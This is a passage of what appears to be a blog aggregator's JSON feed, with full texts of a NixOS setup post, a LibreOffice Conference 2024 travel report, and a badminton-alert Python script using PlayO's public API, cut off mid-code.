true.",[],{"slug":658,"title":659,"link":660,"pubDate":661,"contentSnippet":662,"tags":663,"maintainerName":410,"maintainerUsername":411,"maintainerPhoto":412,"feedUrl":413},"deep-learning-intro","Getting Started with Deep Learning: A Hands-On Introduction","https:\u002F\u002Fworkdone0.substack.com\u002Fp\u002Fdeep-learning-intro","Tue, 15 Apr 2025 00:00:00 GMT","Learn how to build a working deep learning image classifier in just a few lines of code — and peek behind the scenes to understand what really happens under the hood.",[],{"slug":665,"title":666,"link":667,"pubDate":668,"contentSnippet":669,"tags":670,"maintainerName":56,"maintainerUsername":57,"maintainerPhoto":58,"feedUrl":59},"index-html-6","Keeping it Old-Tool: REPL habits of a grug-brained Clojure programmer","https:\u002F\u002Fwww.evalapply.org\u002Fposts\u002Fdemo-clojure-workflow-scicloj\u002Findex.html","Fri, 28 Mar 2025 00:00:00 +0000","Is demo of Grug Clojure code vibe. He no catch onto cloud LLM magics for some reason. Still prefer program with only brain-muscles. Prefer use Grug language standard library and standard dev tools. Prefer make and use all byte on local disk. Maybe luddite, maybe obsolete. Grug no mind. Fine with how he code. Besides, Grug like muscles. Hope maybe you see tip, trick, tactic to steal. Take what can use, no take what no can use.",[55,49,457,54,52,246,227,244,245],{"slug":672,"title":673,"link":674,"pubDate":675,"contentSnippet":676,"tags":677,"maintainerName":94,"maintainerUsername":95,"maintainerPhoto":96,"feedUrl":97},"trying-nixos","Trying out NixOS","https:\u002F\u002Fmrkaran.dev\u002Fposts\u002Ftrying-nixos\u002F","2025-03-23T04:45:00.000Z","I’ve been introduced to Nix by my colleagues at work. Being a Linux user for over a decade and a serial distro hopper, I was curious to learn more about it. I’d seen Nix mentioned before, but the comments about its steep learning curve made me wonder if the effort was worth it. I decided to give it a try by reading this excellent beginner’s guide however got bored very quickly and decided to “learn on the fly”. I spun up a VM in my homelab to install NixOS using their official GUI installer image.\nInstallation & First Impressions#\nThe installation was as straightforward as any other Linux distro. NixOS is a declarative operating system that leverages the Nix functional package manager and a rich ecosystem of Nix packages. The flexibility is mind-blowing: you can configure everything—from user accounts and SSH keys to $SHELL config and plugins entirely through code.\nOnce installed, the first place you’d want to poke around is the \u002Fetc\u002Fnixos directory, which contains two essential configuration files:\nhardware-configuration.nix: Generated during installation (or regenerated with commands like nixos-generate-config), it has hardware-specific details such as filesystem mount points, disk configurations, kernel modules etc. See an example file here.\nconfiguration.nix: This is the most important file you want to start editing with. Here you define system-wide settings like timezone, locale, user accounts, and networking. Everything is declared in one place, making your system’s state reproducible.\nFirst Configuration Changes#\nWhen I opened the terminal, I immediately noticed that vim wasn’t installed. So, I updated my configuration.nix to include the packages I needed:\nenvironment.systemPackages = with pkgs; [\n  git\n  vim\n];\nAfter saving, I ran:\nsudo nixos-rebuild switch\nThis rebuilds the system using the new declarative configuration.\nVersion Control & Flakes#\nNext, I wanted to set up version control for my Nix configurations. The key takeaway is that while the system’s state is revertable in NixOS, your personal data (which includes configuration.nix) isn’t automatically backed up. You must manage your own version history for your Nix configs. Since I was tweaking with no knowledge of Nix, having a version history was crucial.\nI moved my \u002Fetc\u002Fnixos configs to ~\u002FCode\u002Fnixos-configs and initialized a Git repository:\n# Create repo in home directory (better than root-owned \u002Fetc\u002Fnixos)\nmkdir ~\u002Fnixos-config\ncp -r \u002Fetc\u002Fnixos\u002F* ~\u002Fnixos-config\u002F\ncd ~\u002Fnixos-config\n\n# Initialize Git\ngit init\ngit add .\ngit commit -m \"Initial NixOS configuration\"\n\n# Add GitHub remote\ngit remote add origin https:\u002F\u002Fgithub.com\u002Fusername\u002Fnixos-config.git\ngit push -u origin main\nHere’s how flake.nix looks:\n{\n  description = \"NixOS configuration for Karan's homelab, servers, and personal dev machines\";\n\n  inputs = {\n    nixpkgs.url = \"github:nixos\u002Fnixpkgs\u002Fnixos-unstable\";\n    \n    # Add agenix as an input\n    agenix = {\n      url = \"github:ryantm\u002Fagenix\";\n      inputs.nixpkgs.follows = \"nixpkgs\";\n    };\n    # Optionally add other inputs like home-manager\n    # home-manager = {\n    #   url = \"github:nix-community\u002Fhome-manager\u002Frelease-24.11\";\n    #   inputs.nixpkgs.follows = \"nixpkgs\";\n    # };\n  };\n\n  outputs = { self, agenix, nixpkgs, ... }@inputs: {\n    # Make agenix available as a package\n    packages.x86_64-linux.agenix = agenix.packages.x86_64-linux.default;\n    \n    nixosConfigurations.work = nixpkgs.lib.nixosSystem {\n      system = \"x86_64-linux\";\n      modules = [\n        .\u002Fconfiguration.nix\n        agenix.nixosModules.default  # Add agenix module\n      ];\n    };\n  };\n}\nA Note on Flakes#\nFlakes are an experimental (although widely adopted in the community) feature in Nix that bring reproducibility, composability, and a standardized structure to your configurations and package definitions. They allow you to declare all inputs (like nixpkgs, home-manager, or other repositories) and outputs (such as system configurations, packages, or development shells) in a single file. Flakes also create a lock file (flake.lock) that pins your dependencies to specific revisions, ensuring that your builds remain reproducible over time.\nI learned the hard way that—even for local configurations you must commit your files. Otherwise, you may see errors like:\npath '\u002Fnix\u002Fstore\u002F...source\u002Fflake.nix' does not exist\nEven if you’re using local paths and have no intention to push to git, you still need git init && git add for flakes to work.\nFrom whatever google-fu I did, it seems this requirement is to ensure that flakes can reliably reference the exact content in your configuration.\nI am sure there might be good reasons for it (as I said before, I’ve skipped RTFMing altogether ^_^), but atleast the errors can be more verbose\u002Fhelpful.\nAnd why I skipped docs: Remember, we’re on a mission to get things up and running with Nix and then later spend time about reading their internals if it actually proves to be a valuable experiment.\nSwitching Channels#\nWhile installing packages, I noticed some packages were quite outdated. That’s when I learned about NixOS channels. Think of channels as analogous to LTS releases. For faster updates, you can switch to the unstable channel. Although the name sounds intimidating, it simply means you’ll receive more frequent package updates.\nTo do this, you can edit your flake.nix and switch the URL to an unstable channel:\n  inputs = {\n    - nixpkgs.url = \"github:NixOS\u002Fnixpkgs\u002Fnixos-24.11\"; # Stable channel\n    + nixpkgs.url = \"github:NixOS\u002Fnixpkgs\u002Fnixos-unstable\"; # Unstable channel\n  };\nFirmware Updates#\nAfter setting up packages, it was time to configure firmware updates using fwupd—essential for keeping your hardware up to date.\nI asked Claude to help me for a quick setup. Here’s what I did:\n{ config, pkgs, ... }:\n\n{\n  services.fwupd.enable = true;\n}\nThen run a rebuild:\nsudo nixos-rebuild switch\nOnce enabled, you can use the fwupdmgr command-line tool to manage firmware updates:\n# Refresh metadata and check for available updates\nfwupdmgr refresh\nfwupdmgr get-updates\n# Install available firmware updates\nfwupdmgr update\nFine Tuning#\nI also tweaked some settings for the Nix package manager to optimize builds, caching, and overall performance. Here’s a snippet from my configuration:\n  # Nix package manager optimizations\n  nix = {\n    settings = {\n      # Optimize store to remove duplicate files\n      auto-optimise-store = true;\n\n      # Allow building multiple derivations in parallel\n      max-jobs = \"auto\";\n\n      # Number of parallel build tasks per job\n      cores = 0; # 0 means use all available cores\n\n      # Use the binary cache aggressively\n      substituters = [\n        \"\u003Chttps:\u002F\u002Fcache.nixos.org>\"\n        \"\u003Chttps:\u002F\u002Fnix-community.cachix.org>\"\n        \"\u003Chttps:\u002F\u002Fnixpkgs-wayland.cachix.org>\"\n      ];\n\n      # Optimize fetching from GitHub\n      connect-timeout = 5;\n\n      # Prevent unneeded rebuilds\n      commit-lockfile-summary = \"Update flake.lock\";\n    };\n\n    # Garbage collection settings\n    gc = {\n      automatic = true;\n      dates = \"weekly\";\n      options = \"--delete-older-than 30d\";\n    };\n\n    # Optimize builds using different build cores\n    buildCores = 0; # 0 means use all available cores\n\n    # Enable flakes and modern Nix command features\n    extraOptions = ''\n      experimental-features = nix-command flakes\n      warn-dirty = false\n      keep-going = true\n      log-lines = 20\n    '';\n  };\nEscape Hatches#\nSo far things seems all rosy. Within just spending a couple of minutes - I had a perfectly working machine for myself - and the best part - all reproducible with a single command. I was starting to see why people who use NixOS preach about it so much.\nHowever, not everything is smooth when you deviate from the happy path. For instance, I use Aider for LLM assisted programming, but the version on Nixpkgs was about three minor versions behind. Typically for any other software, I wouldn’t have cared so much - however with these LLM tools, a lot changes rapidly and I didn’t want to stay behind. Besides, it seemed like a fun exercise in getting my hands dirty by installing a Python package on NixOS which turned out to be quite tricky because Nix is absurdly obsessive about fully isolated builds.\nHere’s an example flake that I used for attempting to install Aider with uv  in a dev shell (which didn’t work btw):\n{\n  description = \"Aider development environment\";\n\n  inputs = {\n    nixpkgs.url = \"github:NixOS\u002Fnixpkgs\u002Fnixos-unstable\";\n    flake-utils.url = \"github:numtide\u002Fflake-utils\";\n  };\n\n  outputs = { self, nixpkgs, flake-utils }:\n    flake-utils.lib.eachDefaultSystem (system:\n      let\n        pkgs = nixpkgs.legacyPackages.${system};\n      in\n      {\n        devShell = pkgs.mkShell {\n          buildInputs = with pkgs; [\n            python312\n            uv\n          ];\n          shellHook = ''\n            export PATH=\"$HOME\u002F.local\u002Fbin:$PATH\"\n          '';\n        };\n      }\n    );\n}\nEntering the dev shell with nix develop and installing Aider with uv:\nuv tool install --force --python python3.12 aider-chat@latest\nHowever, I ran into this error:\n\"\u002Fhome\u002Fkaran\u002F.local\u002Fshare\u002Fuv\u002Ftools\u002Faider-chat\u002Flib\u002Fpython3.12\u002Fsite-packages\u002Flitellm\u002Flitellm_core_uti\nls\u002Fllm_cost_calc\u002Futils.py\", line 9, in \u003Cmodule>\n    from litellm.utils import get_model_info\n  File\n\"\u002Fhome\u002Fkaran\u002F.local\u002Fshare\u002Fuv\u002Ftools\u002Faider-chat\u002Flib\u002Fpython3.12\u002Fsite-packages\u002Flitellm\u002Futils.py\", line\n53, in \u003Cmodule>\n    from tokenizers import Tokenizer\n  File\n\"\u002Fhome\u002Fkaran\u002F.local\u002Fshare\u002Fuv\u002Ftools\u002Faider-chat\u002Flib\u002Fpython3.12\u002Fsite-packages\u002Ftokenizers\u002F__init__.py\",\nline 78, in \u003Cmodule>\n    from .tokenizers import (\nImportError: libstdc++.so.6: cannot open shared object file: No such file or directory\nThe error indicated that Aider was missing a required dependency libstdc++.so.6 which is a part of the C++ standard library needed by the tokenizers package. To fix this, I added stdenv.cc.cc.lib (and even gcc to be on the safer side) to my buildInputs. This is because while uv installs Python packages, it doesn’t handle system-level dependencies. In a Nix environment, every dependency, including system libraries, must be explicitly specified.\nFrankly, Python’s packaging ecosystem is still a mess. Although tools like uv help, achieving a completely isolated build, especially when shared libraries are involved is challenging. I wish the Python community would put more effort into resolving these issues.\nWhile I was able to make aider work by explicitly adding all the dependencies, I faced another outdate package: code-cursor. Since this is a full blown electron app, I didn’t wish to package this myself.\nAfter some frustration, I tried using Distrobox as recommended by a colleague. Distrobox lets you run containers that feel almost like a native OS by managing user IDs, host mounts, network interfaces, and more. I used an Arch Linux image, installed cursor-bin from the AUR, and everything worked fine. Well mostly:\nFonts were missing. So, if I want to use custom fonts in my IDE - I need to have them installed in the container as well.\nSince my fish shell config had export EDITOR=nvim, I had to install neovim in the container as well, otherwise, I’d get an error when trying to git commit etc. There’s an option to customise the shell in distrobox, but for whatever reason (that I didn’t want to debug), it didn’t work for me.\nYet, something still felt off. The whole point of using NixOS is to achieve a fully declarative and reproducible setup. Resorting to an escape hatch like Distrobox undermines that goal. So I was very conflicted about this. I’m sure there’s a better way to handle these situations, and I should probably read the docs to find out.\nFinal Thoughts#\nI’m definitely sold on running NixOS, especially when managing multiple systems. With a single declarative file (configuration.nix), duplicating your setup across machines becomes effortless. No more “documenting” (or rather forgetting to document and keeping it updated)- as the config is the single source of truth.\nFun fact: I even messed up my NixOS build by misconfiguring the hardware-configuration.nix, and my system became unusable even after a reboot, it couldn’t mount the filesystem on the correct device. In other distros, that would have sent me into panic mode, but with NixOS, all I had to do was revert to the previous working state, and everything was fine. That was so cool!\nI’m definitely considering moving my homelab to NixOS in the coming few days because I honestly see the value for a server setup. I often set up my personal server and then forget everything I’ve done and I’m always scared of touching or creating a new server from scratch. I even created a small shell script installer to help me for getting a base system ready. But like this shell script or even tools such as Ansible - they are all idempotent in nature. However in Nix, if I remove a certain piece from the configuration, there isn’t a trace of it left on the system. That makes it truly declarative and reproducible - unlike Ansible where you can still have some parts of the old setup.\nHowever, for my primary machine at work, I’ll wait on the sidelines until the packages I depend on resolve their dependency issues and I get a chance to read up more on the escape hatches I tried to see if there’s a more streamlined way of doing things. I might be missing a lot of fundamental details since I skipped the docs entirely to get my hands dirty. But now that I see the value of a declarative system and especially how easy it is to roll back the machine to a previously known good state, I’m motivated to read up more on this and might post an update to this blog.\nFin!",[],{"slug":679,"title":680,"link":681,"pubDate":682,"contentSnippet":683,"tags":684,"maintainerName":410,"maintainerUsername":411,"maintainerPhoto":412,"feedUrl":413},"python-decorator","Mastering Python Decorators: A Practical Guide","https:\u002F\u002Fworkdone0.substack.com\u002Fp\u002Fpython_decorator","Sat, 22 Mar 2025 00:00:00 GMT","Dive into decorators — learn how they wrap and enhance functionality with a timing example, best practices, and clear code you can use today.",[],{"slug":686,"title":687,"link":688,"pubDate":689,"contentSnippet":690,"tags":691,"maintainerName":38,"maintainerUsername":39,"maintainerPhoto":40,"feedUrl":41},"libreoffice-conference-2024","Libreoffice Conference 2024 in Luxembourg","https:\u002F\u002Fravidwivedi.in\u002Fposts\u002Flibreoffice-conference-2024\u002F","Fri, 14 Mar 2025 21:48:39 +0530","Last year, I attended the annual LibreOffice Conference in Luxembourg with the help of a generous travel grant by The Document Foundation (TDF). It was a three-day event from the 10th to the 12th of October 2024, with an additional day for community meetup on the 9th.\nLuxembourg is a small country in Western Europe. It is insanely wealthy with high living standards. After going through an arduous visa process, I got to the country on the 8th of October. Upon arriving in Luxembourg, I took a bus to the city center, where my hotel — Park Inn — was located. I deboarded the bus at the Luxembourg Central station. Before walking towards my hotel, I stopped to click a few pictures of the beautiful station.\nAll the public transport in Luxembourg was free of cost. The experience of being in Luxembourg was as if I had stepped in another world. The roads had separate tracks for cycling and separate lanes for buses, along with wide footpaths. In addition, the streets were pretty neat and clean.\n\n      \nLuxembourg's Findel Airport. Photo by Ravi Dwivedi. Released under the CC-BY-SA 4.0.\n\n      \nSeparate cycling tracks in Luxembourg. Photo by Ravi Dwivedi. Released under the CC-BY-SA 4.0.\n\n      \nA random road in Luxembourg with separate lane for buses. Photo by Ravi Dwivedi. Released under the CC-BY-SA 4.0.\nThe conference venue was in Belval, while I stayed in the city center. Even though my stay was 20 km from the conference venue, the commute was convenient thanks to free of cost train connections. The train rides were comfortable, smooth, and scenic, covering the distance in half an hour. Moreover, I never found the trains to be very crowded, which enabled me to always get a seat.\n\n      \nThis is what trains look like in Luxembourg. Photo by Ravi Dwivedi. Released under the CC-BY-SA 4.0.\n\n      \nThe train ride from my hotel to the conference venue had some scenic views like this one on the way. Photo by Ravi Dwivedi. Released under the CC-BY-SA 4.0.\n\n      \nA tram in Luxembourg with Luxembourg Central station in the background. Photo by Ravi Dwivedi. Released under the CC-BY-SA 4.0.\nMy breakfast was included in the hotel booking. The breakfast had many options. It had coffee and fruit juices, along with diverse food options. Some of the items I remember were croissant, pain au chocolat, brie (a type of cheese), scrambled eggs, boiled eggs, and various types of meat dishes. Other than this, there were fruits such as pears.\n\n      \nThat circular pie in the center of the image is brie - a type of cheese - which I found delicious. Photo by Ravi Dwivedi. Released under the CC-BY-SA 4.0.\nPre-conference, a day was reserved for the community meetup on the 9th of October. On that day, the community members introduced themselves and their contributions to the LibreOffice project. It acted as a brainstorming session. All the attendees got a lovely conference bag, which contained a T-Shirt, a pen and a few stickers. I also met my long time collaborators Mike, Sophie and Italo from the TDF, whom I had interacted only remotely till then. Likewise, I also met TDF’s sysadmin Guilhem, who I interacted before regarding setting up my LibreOffice mirror.\n\n      \nLovely swag bag. Photo by Ravi Dwivedi. Released under the CC-BY-SA 4.0.\nThe conference started on the 10th. There were 5 attendees from India, including me, while most of the attendees were from Europe. The talks were in English. One of the talks that stood out for me was about Luxchat — a chat service run by the Luxembourg government based on the Matrix protocol for the citizens of Luxembourg. I also liked Italo’s talk on why document formats must be freedom-respecting. On the first night, the conference took us to a nice dinner in a restaurant. It offered one more way to socialize with other attendees and explore food at the same time.\n\n      \nA slide from Italo's talk on document freedom. Photo by Ravi Dwivedi. Released under the CC-BY-SA 4.0.\n\n      \nPicture of the hall in which talks were held. Photo by Ravi Dwivedi. Released under the CC-BY-SA 4.0.\nOn the 11th of October, I went for a walk in the morning with Biswadeep for some sightseeing around our hotel area. As a consequence, I missed the group photo of the conference, which I wanted to be in. Anyway, we enjoyed roaming around the picturesque Luxembourg city. We also sampled a tram ride to return to our hotel.\n\n      \nWe encountered such scenic views during our walk. Photo by Ravi Dwivedi. Released under the CC-BY-SA 4.0.\n\n      \nAnother view of Luxembourg city area. Photo by Ravi Dwivedi. Released under the CC-BY-SA 4.0.\nThe conference ended on the 12th with a couple of talks. This conference gave me an opportunity to meet the global LibreOffice community, connect and share ideas. It also gave me a peek into the country of Luxembourg and its people, where I had good experience. English was widely known, and I had no issues getting by.\nThanks to all the organizers and sponsors of the conference!",[],{"slug":693,"title":694,"link":695,"pubDate":696,"contentSnippet":697,"tags":698,"maintainerName":130,"maintainerUsername":131,"maintainerPhoto":132,"feedUrl":133},"riscing-it","RISC-ing It: An incoming landscape shift?","https:\u002F\u002Fwww.divyamohan.com\u002Friscing-it\u002F","Thu, 06 Mar 2025 14:27:33 GMT","The implications of China's RISC-V strategy on global semiconductor and open source ecosystems.",[699,700,701],"policy","tech","Open Source",{"slug":703,"title":704,"link":705,"pubDate":706,"contentSnippet":707,"tags":708,"maintainerName":94,"maintainerUsername":95,"maintainerPhoto":96,"feedUrl":97},"playo-badminton","Automating Badminton Game Alerts","https:\u002F\u002Fmrkaran.dev\u002Fposts\u002Fplayo-badminton\u002F","2025-03-03T18:40:55.000Z","I’ve been playing badminton more regularly since the start of 2025 - almost 4-5 days a week. I recently moved to a new part of the city, which meant I couldn’t play with my old friends anymore. PlayO has been super helpful for finding games with new people. On PlayO, a host creates a game and up to 6 people can join one court for a one-hour badminton doubles session.\nHowever, on hectic days I would often forget to check for badminton games, only to find them fully booked later. I wanted to automate this process by creating a small script that would send me scheduled alerts about today’s game availability, allowing me to book slots before they filled up. I drew inspiration from Matt’s post where he did something similar.\nThankfully, PlayO has a public API endpoint to retrieve a list of available games: https:\u002F\u002Fapi.playo.io\u002Factivity-public\u002Flist\u002Flocation.\nYou can send a POST request to this URL with these parameters for filtering:\n{\n  \"lat\": 12.9783692,\n  \"lng\": 77.6408356,\n  \"cityRadius\": 5,\n  \"gameTimeActivities\": false,\n  \"page\": 0,\n  \"lastId\": \"\",\n  \"sportId\": [\"SP5\"],\n  \"booking\": false,\n  \"date\": [\"2025-03-04T11:03:17.260Z\"]\n}\nIt returns a list of activities matching these filters. One such activity looks like:\n{\n  \"userInfo\": [\n    {\n      \"profilePicUrl\": \"https:\u002F\u002Fplayov2.gumlet.io\u002Fprofiles\u002Fredacted.511716.jpg\",\n      \"fName\": \"Redacted\",\n      \"lName\": \"\",\n      \"karma\": 2800\n    },\n    {\n      \"profilePicUrl\": \"https:\u002F\u002Fplayov2.gumlet.io\u002Fprofiles\u002Fredacted-redacted.png\",\n      \"fName\": \"redacted\",\n      \"lName\": \"N\",\n      \"karma\": 499\n    }\n  ],\n  \"isPlayoGame\": false,\n  \"skill\": \"Intermediate & above\",\n  \"sportName\": \"Badminton\",\n  \"shortListed\": false,\n  \"joineeList\": [\n    \"7f3cf298-3324-4fc2-96ad-b0f00093cd8f\",\n    \"250572a2-555d-4a77-94f0-452142c08f81\",\n    \"cc3b9eb6-a3b5-4c26-8605-0486fa000a4b\",\n    \"8d5d4299-950b-4011-a7ac-b466b1c00e84\",\n    \"235ae56d-6f4f-4106-9304-fb38e7d4add8\"\n  ],\n  \"isPlaypalPlaying\": false,\n  \"lat\": 12.976394040119704,\n  \"lng\": 77.63644146986815,\n  \"location\": \"Game Theory - Double Road Indiranagar, Indiranagar\",\n  \"joineeCount\": 6,\n  \"status\": -1,\n  \"sportsPlayingMode\": {\n    \"name\": \"\",\n    \"icon\": \"\"\n  },\n  \"maxPlayers\": 7,\n  \"full\": false,\n  \"price\": 0,\n  \"startTime\": \"2025-03-04T13:30:00.000Z\",\n  \"endTime\": \"2025-03-04T15:30:00.000Z\",\n  \"minSkill\": 3,\n  \"maxSkill\": 5,\n  \"skillSet\": true,\n  \"booking\": false,\n  \"bookingId\": \"\",\n  \"type\": 0,\n  \"venueId\": \"82af038f-058c-4b2f-bc3d-3a47910d4f97\",\n  \"venueName\": \"Game Theory - Double Road Indiranagar, Indiranagar\",\n  \"activityType\": \"regular\",\n  \"isOnline\": false,\n  \"groupId\": \"\",\n  \"groupName\": \"\",\n  \"currencyTxt\": \"INR\",\n  \"strictSkill\": true,\n  \"date\": \"2025-03-04T00:00:00.000Z\",\n  \"hostId\": \"redacted\",\n  \"sportId\": \"SP5\",\n  \"timing\": 2,\n  \"id\": \"e2ee9f62-c9b6-472b-aea2-b0c52dd7c525\",\n  \"distance\": 0.5249236963063415,\n  \"courtInfo\": \"\",\n  \"sponsored\": false,\n  \"groups\": []\n}\nUsing the above response, I filtered for games where:\nfull is false (This indicates that joineeCount == maxPlayer is not true, meaning spots are still available to join)\nstartTime and endTime fall within 7-8PM IST\nI also wanted to add a feature to send these details to Telegram for convenient notifications. I then vibe coded with Claude 3.7 to create a Python script to automate this whole process. Impressively, it produced a working script pretty much in a one-shot prompt, though I had to make a few minor tweaks. I quite like Simon Willison’s approach of using uv to build one-shot tools. Managing dependencies, virtual environments, etc. is still a pain point in Python, but using uv feels like magic by comparison.\n# \u002F\u002F\u002F script\n# requires-python = \">=3.12\"\n# dependencies = [\n#     \"click\",\n#     \"requests\",\n#     \"pytz\",\n#     \"rich\",\n#     \"python-dateutil\",\n#     \"python-telegram-bot\",\n# ]\n# \u002F\u002F\u002F\n\nimport click\nimport requests\nimport json\nimport datetime\nimport pytz\nimport os\nimport sys\nfrom rich.console import Console\nfrom rich.table import Table\nfrom dateutil import parser\nfrom telegram import Bot, InputMediaPhoto\nfrom telegram.constants import ParseMode\nfrom io import BytesIO\nimport asyncio\n\nconsole = Console()\n\n@click.command()\n@click.option(\"--lat\", default=12.9783692, help=\"Latitude for search\")\n@click.option(\"--lng\", default=77.6408356, help=\"Longitude for search\")\n@click.option(\"--radius\", default=50, help=\"City radius in km\")\n@click.option(\"--sport\", default=\"SP5\", help=\"Sport ID (default: SP5 for Badminton)\")\n@click.option(\"--start-time\", default=\"19:00\", help=\"Desired start time (24-hour format HH:MM)\")\n@click.option(\"--end-time\", default=\"20:00\", help=\"Desired end time (24-hour format HH:MM)\")\n@click.option(\"--timezone\", default=\"Asia\u002FKolkata\", help=\"Your timezone\")\n@click.option(\"--verbose\", is_flag=True, help=\"Show detailed information including exact UTC\u002FIST times\")\n@click.option(\"--include-full\", is_flag=True, help=\"Include games that are full\")\n@click.option(\"--telegram\", is_flag=True, help=\"Send results to Telegram\")\n@click.option(\"--telegram-token\", envvar=\"TELEGRAM_BOT_TOKEN\", help=\"Telegram Bot Token (or set TELEGRAM_BOT_TOKEN env var)\")\n@click.option(\"--telegram-chat-id\", envvar=\"TELEGRAM_CHAT_ID\", help=\"Telegram Chat ID (or set TELEGRAM_CHAT_ID env var)\")\ndef find_games(lat, lng, radius, sport, start_time, end_time, timezone, verbose, include_full, telegram, telegram_token, telegram_chat_id):\n    \"\"\"Find available badminton games on Playo matching your criteria.\"\"\"\n    # Get today's date in the specified timezone\n    local_tz = pytz.timezone(timezone)\n    now = datetime.datetime.now(local_tz)\n    today_date = now.strftime(\"%Y-%m-%dT%H:%M:%S.%fZ\")\n\n    # Parse desired time window\n    try:\n        desired_start = datetime.datetime.strptime(start_time, \"%H:%M\").time()\n        desired_end = datetime.datetime.strptime(end_time, \"%H:%M\").time()\n    except ValueError:\n        console.print(\"[bold red]Error:[\u002Fbold red] Invalid time format. Please use HH:MM (24-hour format).\")\n        return\n\n    console.print(f\"[bold green]Searching for badminton games around your location...[\u002Fbold green]\")\n    console.print(f\"Looking for games between [bold]{start_time}[\u002Fbold] and [bold]{end_time}[\u002Fbold] IST today\")\n\n    if verbose:\n        console.print(f\"[dim]Search parameters: lat={lat}, lng={lng}, radius={radius}km[\u002Fdim]\")\n        console.print(f\"[dim]Current time in {timezone}: {now.strftime('%Y-%m-%d %H:%M:%S')}[\u002Fdim]\")\n\n    # Prepare API request\n    url = \"https:\u002F\u002Fapi.playo.io\u002Factivity-public\u002Flist\u002Flocation\"\n    payload = {\n        \"lat\": lat,\n        \"lng\": lng,\n        \"cityRadius\": radius,\n        \"gameTimeActivities\": False,\n        \"page\": 0,\n        \"lastId\": \"\",\n        \"sportId\": [sport],\n        \"booking\": False,\n        \"date\": [today_date]\n    }\n\n    headers = {\n        \"Content-Type\": \"application\u002Fjson\",\n        \"User-Agent\": \"Mozilla\u002F5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\u002F537.36 (KHTML, like Gecko) Chrome\u002F91.0.4472.124 Safari\u002F537.36\"\n    }\n\n    try:\n        response = requests.post(url, headers=headers, json=payload)\n        response.raise_for_status()\n        data = response.json()\n\n        if data.get(\"requestStatus\") != 1 or \"data\" not in data:\n            console.print(\"[bold red]Error:[\u002Fbold red] Failed to get valid response from Playo API\")\n            return\n\n        # Process activities\n        activities = data[\"data\"].get(\"activities\", [])\n        if not activities:\n            console.print(\"[yellow]No badminton activities found for today[\u002Fyellow]\")\n            return\n\n        # Filter activities based on criteria\n        matching_games = []\n\n        for activity in activities:\n            # Convert UTC times to local timezone\n            start_time_utc = parser.parse(activity[\"startTime\"])\n            end_time_utc = parser.parse(activity[\"endTime\"])\n\n            start_time_local = start_time_utc.astimezone(local_tz)\n            end_time_local = end_time_utc.astimezone(local_tz)\n\n            # Print all times in debug mode\n            # console.print(f\"DEBUG: {activity.get('location', 'Unknown')} - Start: {start_time_local.strftime('%H:%M')} IST (UTC: {start_time_utc.strftime('%H:%M')})\")\n\n            # Convert time objects correctly for comparison\n            start_hour = start_time_local.hour\n            start_minute = start_time_local.minute\n\n            # Convert desired times to hours and minutes for easier comparison\n            desired_start_hour = desired_start.hour\n            desired_start_minute = desired_start.minute\n            desired_end_hour = desired_end.hour\n            desired_end_minute = desired_end.minute\n\n            # Check if this game starts at 7PM (19:00) and ends at 8PM (20:00)\n            is_time_match = False\n\n            # Get duration in minutes\n            duration_minutes = ((end_time_local.hour * 60 + end_time_local.minute) -\n                               (start_time_local.hour * 60 + start_time_local.minute))\n\n            # Check if start time is 7PM (with small tolerance)\n            if (start_hour == desired_start_hour and\n                start_minute >= desired_start_minute and\n                start_minute \u003C desired_start_minute + 10):  # Allow a small window of 10 minutes\n\n                # Check if duration is approximately 1 hour (between 50-70 minutes)\n                if 50 \u003C= duration_minutes \u003C= 70:\n                    is_time_match = True\n\n            # Check if there are available slots\n            is_available = (\n                not activity.get(\"full\", True) and\n                (activity.get(\"maxPlayers\", 0) == -1 or\n                 activity.get(\"joineeCount\", 0) \u003C activity.get(\"maxPlayers\", 0))\n            )\n\n            # When verbose, print time details for each game to help debug\n            if verbose:\n                time_info = f\"[dim]{activity.get('location', 'Unknown')} - Start: {start_time_local.strftime('%H:%M')} IST ({start_time_utc.strftime('%H:%M')} UTC), \" + \\\n                           f\"End: {end_time_local.strftime('%H:%M')} IST, Duration: {duration_minutes} min, \" + \\\n                           f\"Time match: {'Yes' if is_time_match else 'No'}, Available: {'Yes' if is_available else 'No'}[\u002Fdim]\"\n                console.print(time_info)\n\n            # Both conditions must be true\n            if is_time_match and is_available:\n                matching_games.append({\n                    \"id\": activity[\"id\"],\n                    \"location\": activity[\"location\"],\n                    \"venue_name\": activity.get(\"venueName\", \"N\u002FA\"),\n                    \"start\": start_time_local.strftime(\"%I:%M %p\"),\n                    \"end\": end_time_local.strftime(\"%I:%M %p\"),\n                    \"players\": f\"{activity.get('joineeCount', 0)}\u002F{activity.get('maxPlayers', 'unlimited')}\",\n                    \"host\": activity.get(\"userInfo\", [{}])[0].get(\"fName\", \"Unknown\"),\n                    \"skill\": activity.get(\"skill\", \"Any\"),\n                    \"price\": f\"{activity.get('price', 0)} {activity.get('currencyTxt', 'INR')}\"\n                })\n\n        # Display results\n        if matching_games:\n            table = Table(title=f\"Available Badminton Games ({len(matching_games)} matches found)\")\n\n            table.add_column(\"Location\", style=\"cyan\")\n            table.add_column(\"Time\", style=\"green\")\n            table.add_column(\"Players\", style=\"yellow\")\n            table.add_column(\"Host\", style=\"magenta\")\n            table.add_column(\"Skill Level\", style=\"blue\")\n            table.add_column(\"Link\", style=\"bright_blue\")\n\n            for game in matching_games:\n                table.add_row(\n                    f\"{game['venue_name']}\",\n                    f\"{game['start']} - {game['end']}\",\n                    game[\"players\"],\n                    game[\"host\"],\n                    game[\"skill\"],\n                    f\"https:\u002F\u002Fplayo.co\u002Fmatch\u002F{game['id']}\"\n                )\n\n            console.print(table)\n\n            # Send to Telegram if requested\n            if telegram:\n                if not telegram_token or not telegram_chat_id:\n                    console.print(\"[bold red]Error:[\u002Fbold red] Telegram token and chat ID are required for Telegram notifications\")\n                    console.print(\"[dim]Set them with --telegram-token and --telegram-chat-id or via environment variables[\u002Fdim]\")\n                else:\n                    try:\n                        send_to_telegram(matching_games, telegram_token, telegram_chat_id)\n                        console.print(\"[green]Results sent to Telegram successfully![\u002Fgreen]\")\n                    except Exception as e:\n                        console.print(f\"[bold red]Error sending to Telegram:[\u002Fbold red] {e}\")\n        else:\n            console.print(\"[yellow]No games found matching your criteria[\u002Fyellow]\")\n            if telegram and telegram_token and telegram_chat_id:\n                try:\n                    asyncio.run(send_telegram_message(\n                        \"No badminton games found matching your criteria for today.\",\n                        telegram_token,\n                        telegram_chat_id\n                    ))\n                    console.print(\"[green]Empty results notification sent to Telegram[\u002Fgreen]\")\n                except Exception as e:\n                    